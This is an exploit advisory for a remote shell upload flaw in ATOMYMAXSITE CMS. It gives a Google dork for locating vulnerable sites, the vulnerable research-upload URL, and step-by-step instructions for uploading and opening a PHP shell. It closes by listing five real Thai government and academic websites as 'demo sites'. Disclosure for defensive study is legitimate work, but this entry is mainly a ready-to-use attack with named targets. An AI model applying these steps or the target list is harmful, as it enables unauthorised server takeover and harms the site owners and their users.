ATOMYMAXSITE CMS Remote Shell Upload Vulnerability

1.  
2. ,------. ,--. ,-----. ,--.
3. | .-. \ ,---. ,--,--. ,-| | ,---. ' .-. ',--.,--.| |
4. | | \ :| .-. :' ,-. |' .-. |( .-' | | | || || || |
5. | '--' /\ --.\ '-' |\ `-' |.-' `)' '-' '' '' '| |
6. `-------' `----' `--`--' `---' `----' `-----' `----' `--'
7. dead_s0ul@outlook.com
8.  
9. # [+] Exploit Title: ATOMYMAXSITE CMS Remote Shell Upload Vulnerability
10. # [+] Google Dork: "Powered by ATOMYMAXSITE"
11. # [+] Date: 30/06/2013
12. # [+] Exploit Author: Iranian_Dark_Coders_Team
13. # [+] Vendor Homepage: http://board.maxsitepro.com
14. # [+] Version: All Version [1.50 - 2.5]
15. # [+] Tested on: Windows 7
16. #
17. #######################################################
18. #
19. # [+] Exploit:
20. #
21. # [+] http://localhost/[path]/index.php?name=research&file=add&op=research_add
22. #
23. #######################################################
24. #
25. # [+] Proof:
26. #
27. # [+] http://localhost/[path]/index.php?name=research&file=add&op=research_add
28. # [+] Then fill in all the information requested
29. # [+] Now click on the Browse front of ผลงานฉบับเต็ม(Fultext) and select shell.php
30. # [+] Now click on the button below the form to be registered
31. # [+] http://localhost/[path]/index.php?name=research
32. # [+] Now select the first record and click the (FullText)
33. # [+] (FullText) = Path shell.php
34. #
35. #######################################################
36. #
37. # [+] Demo site:
38. #
39. # [+] http://plan.chon1.go.th
40. # [+] http://tbacud.ac.th
41. # [+] http://www.nitedcpm1.net
42. # [+] http://ict.chon1.go.th/home/
43. # [+] http://www.chiangdaocity.go.th/home
44.  
45. ./s0ul